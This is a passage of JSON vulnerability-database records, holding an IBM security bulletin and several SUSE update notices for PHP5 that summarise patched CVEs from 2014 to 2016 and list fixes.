"obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6831", "CVE-2015-6832", "CVE-2015-6833", "CVE-2015-6834", 
"CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838", "CVE-2015-7803", "CVE-2015-7804"], "modified": "2022-07-21T05:54:17", "id": "OSV:DLA-341-1", "href": "https://osv.dev/vulnerability/DLA-341-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ibm": [{"lastseen": "2022-06-28T21:59:13", "description": "## Summary\n\nMultiple security vulnerabilities have been discovered in php5 that is embedded in the IBM FSM. This bulletin addresses these vulnerabilities.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-6836_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6836>)** \nDESCRIPTION:** PHP could allow a remote attacker to execute arbitrary code on the system, caused by a type confusion error in the SOAP serialize_function_call() function. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/106365_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/106365>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n\n**CVEID:** [_CVE-2015-6837_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6837>)** \nDESCRIPTION:** PHP could allow a remote attacker to execute arbitrary code on the system, caused by a NULL pointer dereference error. By sending specially crafted XSLT data, an attacker could exploit this vulnerability to execute arbitrary code on the system. 
\nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/106366_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/106366>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n**CVEID:** [_CVE-2015-6838_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6838>)** \nDESCRIPTION:** PHP could allow a remote attacker to execute arbitrary code on the system, caused by a NULL pointer dereference error. By sending specially crafted XSLT data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/106367_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/106367>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nFlex System Manager 1.3.4.x \nFlex System Manager 1.3.3.x \nFlex System Manager 1.3.2.x \nFlex System Manager 1.3.1.x \nFlex System Manager 1.3.0.x \nFlex System Manager 1.2.x.x \nFlex System Manager 1.1.x.x\n\n## Remediation/Fixes\n\nIBM recommends updating the FSM using the instructions referenced in this table. 
\n \n\n\nProduct | \n\nVRMF | \n\nAPAR | \n\nRemediation \n---|---|---|--- \nFlex System Manager| \n\n1.3.4.x | \n\nIT14622\n\n| Install [fsmfix_1.3.4.0_IT14622_IT14623_IT14624](<http://www-933.ibm.com/support/fixcentral/systemx/selectFix?product=ibm%2Fsystemx%2F8731&fixids=fsmfix1.3.4.0_IT14622_IT14623_IT14624&function=fixId&parent=Flex%20System%20Manager%20Node>) \nFlex System Manager| \n\n1.3.3.x | \n\nIT14622\n\n| Install [fsmfix_1.3.3.0_IT14622_IT14623_IT14624](<http://www-933.ibm.com/support/fixcentral/systemx/selectFix?product=ibm%2Fsystemx%2F8731&fixids=fsmfix1.3.3.0_IT14622_IT14623_IT14624&function=fixId&parent=Flex%20System%20Manager%20Node>) \nFlex System Manager| \n\n1.3.2.x | \n\nIT14622\n\n| Install [fsmfix_1.3.2.0_IT14622_IT14623_IT14624](<http://www-933.ibm.com/support/fixcentral/systemx/selectFix?product=ibm%2Fsystemx%2F8731&fixids=fsmfix1.3.2.0_IT14622_IT14623_IT14624&function=fixId&parent=Flex%20System%20Manager%20Node>) \nFlex System Manager| \n\n1.3.1.x | \n\nIT14622\n\n| IBM recommends upgrading to a fixed, supported version/release and following the appropriate remediation for all vulnerabilities. \nFlex System Manager| \n\n1.3.0.x | \n\nIT14622\n\n| IBM recommends upgrading to a fixed, supported version/release and following the appropriate remediation for all vulnerabilities. \nFlex System Manager| \n\n1.2.x.x | \n\nIT14622\n\n| IBM recommends upgrading to a fixed, supported version/release and following the appropriate remediation for all vulnerabilities. \nFlex System Manager| \n\n1.1.x.x | \n\nIT14622\n\n| IBM recommends upgrading to a fixed, supported version/release and following the appropriate remediation for all vulnerabilities. 
\n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n25 April 2016 : Original version published\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. 
As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Internal Use Only\n\nAdvisory 5000, PSIRT 73360\n\n[{\"Product\":{\"code\":\"HW94A\",\"label\":\"Flex System Manager Node\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\"--\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"Version Independent\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-06-18T01:31:31", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in php5 affect IBM Flex System Manager (FSM) (CVE-2015-6836, CVE-2015-6837, 
CVE-2015-6838)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2018-06-18T01:31:31", "id": "EB6743C0F0EED51CD05AFB7F7930AA74C8199711B80DCA1727BE820C2B90040E", "href": "https://www.ibm.com/support/pages/node/628727", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2016-09-04T11:28:45", "description": "The PHP5 script interpreter was updated to fix security issues:\n\n * CVE-2015-6836: A SOAP serialize_function_call() type confusion leading\n to remote code execution problem was fixed. [bnc#945428]\n * CVE-2015-6837 CVE-2015-6838: Two NULL pointer dereferences in the\n XSLTProcessor class were fixed. 
[bnc#945412]\n\n", "cvss3": {}, "published": "2015-10-08T16:10:07", "type": "suse", "title": "Security update for php5 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2015-10-08T16:10:07", "id": "SUSE-SU-2015:1701-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-10/msg00006.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:46:39", "description": "This update of PHP5 brings several security fixes.\n\n Security fixes:\n * CVE-2015-6831: A use after free vulnerability in unserialize() has been\n fixed which could be used to crash php or potentially execute code.\n [bnc#942291] [bnc#942294] [bnc#942295]\n * CVE-2015-6832: A dangling pointer in the unserialization of ArrayObject\n items could be used to crash php or potentially execute code.\n [bnc#942293]\n * CVE-2015-6833: A directory traversal when extracting ZIP files could be\n used to overwrite files outside of intended area. [bnc#942296]\n * CVE-2015-6834: A Use After Free Vulnerability in unserialize() has been\n fixed which could be used to crash php or potentially execute code.\n [bnc#945403]\n * CVE-2015-6835: A Use After Free Vulnerability in session unserialize()\n has been fixed which could be used to crash php or potentially execute\n code. [bnc#945402]\n * CVE-2015-6836: A SOAP serialize_function_call() type confusion leading\n to remote code execution problem was fixed. [bnc#945428]\n * CVE-2015-6837 CVE-2015-6838: Two NULL pointer dereferences in the\n XSLTProcessor class were fixed. [bnc#945412]\n\n Bugfixes:\n * Compare with SQL_NULL_DATA correctly [bnc#935074]\n * If MD5 was disabled in net-snmp we have to disable the used MD5 function\n in ext/snmp/snmp.c as well. (bsc#944302)\n\n Also the Suhosin framework was updated to 0.9.38. 
[fate#319325]\n\n", "cvss3": {}, "published": "2015-09-25T15:09:56", "type": "suse", "title": "Security update for php5 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-6836", "CVE-2015-6833", "CVE-2015-6831", "CVE-2015-6837", "CVE-2015-6835", "CVE-2015-6832", "CVE-2015-6838"], "modified": "2015-09-25T15:09:56", "id": "SUSE-SU-2015:1633-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-09/msg00026.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T12:15:22", "description": "The PHP5 script interpreter was updated to fix various security issues:\n\n * CVE-2015-6831: A use after free vulnerability in unserialize() has been\n fixed which could be used to crash php or potentially execute code.\n [bnc#942291] [bnc#942294] [bnc#942295]\n * CVE-2015-6832: A dangling pointer in the unserialization of ArrayObject\n items could be used to crash php or potentially execute code.\n [bnc#942293]\n * CVE-2015-6833: A directory traversal when extracting ZIP files could be\n used to overwrite files outside of intended area. [bnc#942296]\n * CVE-2015-6834: A Use After Free Vulnerability in unserialize() has been\n fixed which could be used to crash php or potentially execute code.\n [bnc#945403]\n * CVE-2015-6835: A Use After Free Vulnerability in session unserialize()\n has been fixed which could be used to crash php or potentially execute\n code. [bnc#945402]\n * CVE-2015-6836: A SOAP serialize_function_call() type confusion leading\n to remote code execution problem was fixed. [bnc#945428]\n * CVE-2015-6837 CVE-2015-6838: Two NULL pointer dereferences in the\n XSLTProcessor class were fixed. 
[bnc#945412]\n\n", "cvss3": {}, "published": "2015-09-25T11:09:46", "type": "suse", "title": "Security update for php5 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-6836", "CVE-2015-6833", "CVE-2015-6831", "CVE-2015-6837", "CVE-2015-6835", "CVE-2015-6832", "CVE-2015-6838"], "modified": "2015-09-25T11:09:46", "id": "OPENSUSE-SU-2015:1628-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-09/msg00025.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T12:22:34", "description": "This update of PHP5 brings several security fixes.\n\n Security fixes:\n * CVE-2015-6831: A use after free vulnerability in unserialize() has been\n fixed which could be used to crash php or potentially execute code.\n [bnc#942291] [bnc#942294] [bnc#942295]\n * CVE-2015-6836: A SOAP serialize_function_call() type confusion leading\n to remote code execution problem was fixed. [bnc#945428]\n * CVE-2015-6837 CVE-2015-6838: Two NULL pointer dereferences in the\n XSLTProcessor class were fixed. 
[bnc#945412]\n\n It also includes a bugfix for the odbc module:\n * compare with SQL_NULL_DATA correctly [bnc#935074]\n\n", "cvss3": {}, "published": "2015-10-26T15:09:54", "type": "suse", "title": "Security update for php53 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2015-6836", "CVE-2015-6833", "CVE-2015-6831", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2015-10-26T15:09:54", "id": "SUSE-SU-2015:1818-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-10/msg00022.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T12:09:51", "description": "This update for php53 to version 5.3.17 fixes the following issues:\n\n These security issues were fixed:\n - CVE-2016-5093: get_icu_value_internal out-of-bounds read (bnc#982010).\n - CVE-2016-5094: Don't create strings with lengths outside int range\n (bnc#982011).\n - CVE-2016-5095: Don't create strings with lengths outside int range\n (bnc#982012).\n - CVE-2016-5096: int/size_t confusion in fread (bsc#982013).\n - CVE-2016-5114: fpm_log.c memory leak and buffer overflow (bnc#982162).\n - CVE-2015-8879: The odbc_bindcols function in ext/odbc/php_odbc.c in PHP\n mishandles driver behavior for SQL_WVARCHAR columns, which allowed\n remote attackers to cause a denial of service (application crash) in\n opportunistic circumstances by leveraging use of the odbc_fetch_array\n function to access a certain type of Microsoft SQL Server table\n (bsc#981050).\n - CVE-2015-4116: Use-after-free vulnerability in the spl_ptr_heap_insert\n function in ext/spl/spl_heap.c in PHP allowed remote attackers to\n execute arbitrary code by triggering a failed SplMinHeap::compare\n operation (bsc#980366).\n - CVE-2015-8874: Stack consumption vulnerability in GD in PHP allowed\n remote attackers to cause a denial of service via a crafted\n imagefilltoborder call (bsc#980375).\n - CVE-2015-8873: Stack consumption vulnerability in 
Zend/zend_exceptions.c\n in PHP allowed remote attackers to cause a denial of service\n (segmentation fault) via recursive method calls (bsc#980373).\n - CVE-2016-4540: The grapheme_stripos function in\n ext/intl/grapheme/grapheme_string.c in PHP allowed remote attackers to\n cause a denial of service (out-of-bounds read) or possibly have\n unspecified other impact via a negative offset (bsc#978829).\n - CVE-2016-4541: The grapheme_strpos function in\n ext/intl/grapheme/grapheme_string.c in PHP allowed remote attackers to\n cause a denial of service (out-of-bounds read) or possibly have\n unspecified other impact via a negative offset (bsc#978829.\n - CVE-2016-4542: The exif_process_IFD_TAG function in ext/exif/exif.c in\n PHP did not properly construct spprintf arguments, which allowed remote\n attackers to cause a denial of service (out-of-bounds read) or possibly\n have unspecified other impact via crafted header data (bsc#978830).\n - CVE-2016-4543: The exif_process_IFD_in_JPEG function in ext/exif/exif.c\n in PHP did not validate IFD sizes, which allowed remote attackers to\n cause a denial of service (out-of-bounds read) or possibly have\n unspecified other impact via crafted header data (bsc#978830.\n - CVE-2016-4544: The exif_process_TIFF_in_JPEG function in ext/exif/exif.c\n in PHP did not validate TIFF start data, which allowed remote attackers\n to cause a denial of service (out-of-bounds read) or possibly have\n unspecified other impact via crafted header data (bsc#978830.\n - CVE-2016-4537: The bcpowmod function in ext/bcmath/bcmath.c in PHP\n accepted a negative integer for the scale argument, which allowed remote\n attackers to cause a denial of service or possibly have unspecified\n other impact via a crafted call (bsc#978827).\n - CVE-2016-4538: The bcpowmod function in ext/bcmath/bcmath.c in PHP\n modified certain data structures without considering whether they are\n copies of the _zero_, _one_, or _two_ global variable, which allowed\n remote 
attackers to cause a denial of service or possibly have\n unspecified other impact via a crafted call (bsc#978827).\n - CVE-2016-4539: The xml_parse_into_struct function in ext/xml/xml.c in\n PHP allowed remote attackers to cause a denial of service (buffer\n under-read and segmentation fault) or possibly have unspecified other\n impact via crafted XML data in the second argument, leading to a parser\n level of zero (bsc#978828).\n - CVE-2016-4342: ext/phar/phar_object.c in PHP mishandles zero-length\n uncompressed data, which allowed remote attackers to cause a denial of\n service (heap memory corruption) or possibly have unspecified other\n impact via a crafted (1) TAR, (2) ZIP, or (3) PHAR archive (bsc#977991).\n - CVE-2016-4346: Integer overflow in the str_pad function in\n ext/standard/string.c in PHP allowed remote attackers to cause a denial\n of service or possibly have unspecified other impact via a long string,\n leading to a heap-based buffer overflow (bsc#977994).\n - CVE-2016-4073: Multiple integer overflows in the mbfl_strcut function in\n ext/mbstring/libmbfl/mbfl/mbfilter.c in PHP allowed remote attackers to\n cause a denial of service (application crash) or possibly execute\n arbitrary code via a crafted mb_strcut call (bsc#977003).\n - CVE-2015-8867: The openssl_random_pseudo_bytes function in\n ext/openssl/openssl.c in PHP incorrectly relied on the deprecated\n RAND_pseudo_bytes function, which made it easier for remote attackers to\n defeat cryptographic protection mechanisms via unspecified vectors\n (bsc#977005).\n - CVE-2016-4070: Integer overflow in the php_raw_url_encode function in\n ext/standard/url.c in PHP allowed remote attackers to cause a denial of\n service (application crash) via a long string to the rawurlencode\n function (bsc#976997).\n - CVE-2015-8866: ext/libxml/libxml.c in PHP when PHP-FPM is used, did not\n isolate each thread from libxml_disable_entity_loader changes in other\n threads, which allowed remote attackers to 
conduct XML External Entity\n (XXE) and XML Entity Expansion (XEE) attacks via a crafted XML document,\n a related issue to CVE-2015-5161 (bsc#976996).\n - CVE-2015-8838: ext/mysqlnd/mysqlnd.c in PHP used a client SSL option to\n mean that SSL is optional, which allowed man-in-the-middle attackers to\n spoof servers via a cleartext-downgrade attack, a related issue to\n CVE-2015-3152 (bsc#973792).\n - CVE-2015-8835: The make_http_soap_request function in\n ext/soap/php_http.c in PHP did not properly retrieve keys, which allowed\n remote attackers to cause a denial of service (NULL pointer dereference,\n type confusion, and application crash) or possibly execute arbitrary\n code via crafted serialized data representing a numerically indexed\n _cookies array, related to the SoapClient::__call method in\n ext/soap/soap.c (bsc#973351).\n - CVE-2016-3141: Use-after-free vulnerability in wddx.c in the WDDX\n extension in PHP allowed remote attackers to cause a denial of service\n (memory corruption and application crash) or possibly have unspecified\n other impact by triggering a wddx_deserialize call on XML data\n containing a crafted var element (bsc#969821).\n - CVE-2016-3142: The phar_parse_zipfile function in zip.c in the PHAR\n extension in PHP allowed remote attackers to obtain sensitive\n information from process memory or cause a denial of service\n (out-of-bounds read and application crash) by placing a PK\\x05\\x06\n signature at an invalid location (bsc#971912).\n - CVE-2014-9767: Directory traversal vulnerability in the\n ZipArchive::extractTo function in ext/zip/php_zip.c in PHP\n ext/zip/ext_zip.cpp in HHVM allowed remote attackers to create arbitrary\n empty directories via a crafted ZIP archive (bsc#971612).\n - CVE-2016-3185: The make_http_soap_request function in\n ext/soap/php_http.c in PHP allowed remote attackers to obtain sensitive\n information from process memory or cause a denial of service (type\n confusion and application crash) via crafted 
serialized _cookies data,\n related to the SoapClient::__call method in ext/soap/soap.c (bsc#971611).\n - CVE-2016-2554: Stack-based buffer overflow in ext/phar/tar.c in PHP\n allowed remote attackers to cause a denial of service (application\n crash) or possibly have unspecified other impact via a crafted TAR\n archive (bsc#968284).\n - CVE-2015-7803: The phar_get_entry_data function in ext/phar/util.c in\n PHP allowed remote attackers to cause a denial of service (NULL pointer\n dereference and application crash) via a .phar file with a crafted TAR\n archive entry in which the Link indicator references a file that did not\n exist (bsc#949961).\n - CVE-2015-6831: Multiple use-after-free vulnerabilities in SPL in PHP\n allowed remote attackers to execute arbitrary code via vectors involving\n (1) ArrayObject, (2) SplObjectStorage, and (3) SplDoublyLinkedList,\n which are mishandled during unserialization (bsc#942291).\n - CVE-2015-6833: Directory traversal vulnerability in the PharData class\n in PHP allowed remote attackers to write to arbitrary files via a ..\n (dot dot) in a ZIP archive entry that is mishandled during an extractTo\n call (bsc#942296).\n - CVE-2015-6836: The SoapClient __call method in ext/soap/soap.c in PHP\n did not properly manage headers, which allowed remote attackers to\n execute arbitrary code via crafted serialized data that triggers a "type\n confusion" in the serialize_function_call function (bsc#945428).\n - CVE-2015-6837: The xsl_ext_function_php function in\n ext/xsl/xsltprocessor.c in PHP when libxml2 is used, did not consider\n the possibility of a NULL valuePop return value before proceeding with a free\n operation during initial error checking, which allowed remote attackers\n to cause a denial of service (NULL pointer dereference and application\n crash) via a crafted XML document, a different vulnerability than\n CVE-2015-6838 (bsc#945412).\n - CVE-2015-6838: The xsl_ext_function_php function in\n ext/xsl/xsltprocessor.c in PHP when 
libxml2 is used, did not consider\n the possibility of a NULL valuePop return value before proceeding with a free\n operation after the principal argument loop, which allowed remote\n attackers to cause a denial of service (NULL pointer dereference and\n application crash) via a crafted XML document, a different vulnerability\n than CVE-2015-6837 (bsc#945412).\n - CVE-2015-5590: Stack-based buffer overflow in the phar_fix_filepath\n function in ext/phar/phar.c in PHP allowed remote attackers to cause a\n denial of service or possibly have unspecified other impact via a large\n length value, as demonstrated by mishandling of an e-mail attachment by\n the imap PHP extension (bsc#938719).\n - CVE-2015-5589: The phar_convert_to_other function in\n ext/phar/phar_object.c in PHP did not validate a file pointer before a close\n operation, which allowed remote attackers to cause a denial of service\n (segmentation fault) or possibly have unspecified other impact via a\n crafted TAR archive that is mishandled in a Phar::convertToData call\n (bsc#938721).\n - CVE-2015-4602: The __PHP_Incomplete_Class function in\n ext/standard/incomplete_class.c in PHP allowed remote attackers to cause\n a denial of service (application crash) or possibly execute arbitrary\n code via an unexpected data type, related to a "type confusion" issue\n (bsc#935224).\n - CVE-2015-4599: The SoapFault::__toString method in ext/soap/soap.c in\n PHP allowed remote attackers to obtain sensitive information, cause a\n denial of service (application crash), or possibly execute arbitrary\n code via an unexpected data type, related to a "type confusion" issue\n (bsc#935226).\n - CVE-2015-4600: The SoapClient implementation in PHP allowed remote\n attackers to cause a denial of service (application crash) or possibly\n execute arbitrary code via an unexpected data type, related to "type\n confusion" issues in the (1) SoapClient::__getLastRequest, (2)\n SoapClient::__getLastResponse, (3) 
SoapClient::__getLastRequestHeaders,\n (4) SoapClient::__getLastResponseHeaders, (5) SoapClient::__getCookies,\n and (6) SoapClient::__setCookie methods (bsc#935226).\n - CVE-2015-4601: PHP allowed remote attackers to cause a denial of service\n (application crash) or possibly execute arbitrary code via an unexpected\n data type, related to "type confusion" issues in (1)\n ext/soap/php_encoding.c, (2) ext/soap/php_http.c, and (3)\n ext/soap/soap.c, a different issue than CVE-2015-4600 (bsc#935226).\n - CVE-2015-4603: The exception::getTraceAsString function in\n Zend/zend_exceptions.c in PHP allowed remote attackers to execute\n arbitrary code via an unexpected data type, related to a "type\n confusion" issue (bsc#935234).\n - CVE-2015-4644: The php_pgsql_meta_data function in pgsql.c in the\n PostgreSQL (aka pgsql) extension in PHP did not validate token\n extraction for table names, which might have allowed remote attackers to\n cause a denial of service (NULL pointer dereference and application\n crash) via a crafted name. NOTE: this vulnerability exists because of an\n incomplete fix for CVE-2015-1352 (bsc#935274).\n - CVE-2015-4643: Integer overflow in the ftp_genlist function in\n ext/ftp/ftp.c in PHP allowed remote FTP servers to execute arbitrary\n code via a long reply to a LIST command, leading to a heap-based buffer\n overflow. 
NOTE: this vulnerability exists because of an incomplete fix\n for CVE-2015-4022 (bsc#935275).\n - CVE-2015-3411: PHP did not ensure that pathnames lack %00 sequences,\n which might have allowed remote attackers to read or write to arbitrary\n files via crafted input to an application that calls (1) a DOMDocument\n load method, (2) the xmlwriter_open_uri function, (3) the finfo_file\n function, or (4) the hash_hmac_file function, as demonstrated by a\n filename\\0.xml attack that bypasses an intended configuration in which\n client users may read only .xml files (bsc#935227).\n - CVE-2015-3412: PHP did not ensure that pathnames lack %00 sequences,\n which might have allowed remote attackers to read arbitrary files via\n crafted input to an application that calls the\n stream_resolve_include_path function in ext/standard/streamsfuncs.c, as\n demonstrated by a filename\\0.extension attack that bypasses an intended\n configuration in which client users may read files with only one\n specific extension (bsc#935229).\n - CVE-2015-4598: PHP did not ensure that pathnames lack %00 sequences,\n which might have allowed remote attackers to read or write to arbitrary\n files via crafted input to an application that calls (1) a DOMDocument\n save method or (2) the GD imagepsloadfont function, as demonstrated by a\n filename\\0.html attack that bypasses an intended configuration in which\n client users may write to only .html files (bsc#935232).\n - CVE-2015-4148: The do_soap_call function in ext/soap/soap.c in PHP did\n not verify that the uri property is a string, which allowed remote\n attackers to obtain sensitive information by providing crafted\n serialized data with an int data type, related to a "type confusion"\n issue (bsc#933227).\n - CVE-2015-4024: Algorithmic complexity vulnerability in the\n multipart_buffer_headers function in main/rfc1867.c in PHP allowed\n remote attackers to cause a denial of service (CPU consumption) via\n crafted form data that triggers an 
improper order-of-growth outcome\n (bsc#931421).\n - CVE-2015-4026: The pcntl_exec implementation in PHP truncates a pathname\n upon encountering a \\x00 character, which might allowed remote attackers\n to bypass intended extension restrictions and execute files with\n unexpected names via a crafted first argument. NOTE: this vulnerability\n exists because of an incomplete fix for CVE-2006-7243 (bsc#931776).\n - CVE-2015-4022: Integer overflow in the ftp_genlist function in\n ext/ftp/ftp.c in PHP allowed remote FTP servers to execute arbitrary\n code via a long reply to a LIST command, leading to a heap-based buffer\n overflow (bsc#931772).\n - CVE-2015-4021: The phar_parse_tarfile function in ext/phar/tar.c in PHP\n did not verify that the first character of a filename is different from\n the \\0 character, which allowed remote attackers to cause a denial of\n service (integer underflow and memory corruption) via a crafted entry in\n a tar archive (bsc#931769).\n - CVE-2015-3329: Multiple stack-based buffer overflows in the\n phar_set_inode function in phar_internal.h in PHP allowed remote\n attackers to execute arbitrary code via a crafted length value in a (1)\n tar, (2) phar, or (3) ZIP archive (bsc#928506).\n - CVE-2015-2783: ext/phar/phar.c in PHP allowed remote attackers to obtain\n sensitive information from process memory or cause a denial of service\n (buffer over-read and application crash) via a crafted length value in\n conjunction with crafted serialized data in a phar archive, related to\n the phar_parse_metadata and phar_parse_pharfile functions (bsc#928511).\n - CVE-2015-2787: Use-after-free vulnerability in the process_nested_data\n function in ext/standard/var_unserializer.re in PHP allowed remote\n attackers to execute arbitrary code via a crafted unserialize call that\n leverages use of the unset function within an __wakeup function, a\n related issue to CVE-2015-0231 (bsc#924972).\n - CVE-2014-9709: The GetCode_ function in gd_gif_in.c in GD 
2.1.1 and\n earlier, as used in PHP allowed remote attackers to cause a denial of\n service (buffer over-read and application crash) via a crafted GIF image\n that is improperly handled by the gdImageCreateFromGif function\n (bsc#923945).\n - CVE-2015-2301: Use-after-free vulnerability in the phar_rename_archive\n function in phar_object.c in PHP allowed remote attackers to cause a\n denial of service or possibly have unspecified other impact via vectors\n that trigger an attempted renaming of a Phar archive to the name of an\n existing file (bsc#922452).\n - CVE-2015-2305: Integer overflow in the regcomp implementation in the\n Henry Spencer BSD regex library (aka rxspencer) 32-bit platforms might\n have allowed context-dependent attackers to execute arbitrary code via a\n large regular expression that leads to a heap-based buffer overflow\n (bsc#921950).\n - CVE-2014-9705: Heap-based buffer overflow in the\n enchant_broker_request_dict function in ext/enchant/enchant.c in PHP\n allowed remote attackers to execute arbitrary code via vectors that\n trigger creation of multiple dictionaries (bsc#922451).\n - CVE-2015-0273: Multiple use-after-free vulnerabilities in\n ext/date/php_date.c in PHP allowed remote attackers to execute arbitrary\n code via crafted serialized input containing a (1) R or (2) r type\n specifier in (a) DateTimeZone data handled by the\n php_date_timezone_initialize_from_hash function or (b) DateTime data\n handled by the php_date_initialize_from_hash function (bsc#918768).\n - CVE-2014-9652: The mconvert function in softmagic.c in file as used in\n the Fileinfo component in PHP did not properly handle a certain\n string-length field during a copy of a truncated version of a Pascal\n string, which might allowed remote attackers to cause a denial of\n service (out-of-bounds memory access and application crash) via a\n crafted file (bsc#917150).\n - CVE-2014-8142: Use-after-free vulnerability in the process_nested_data\n function in 
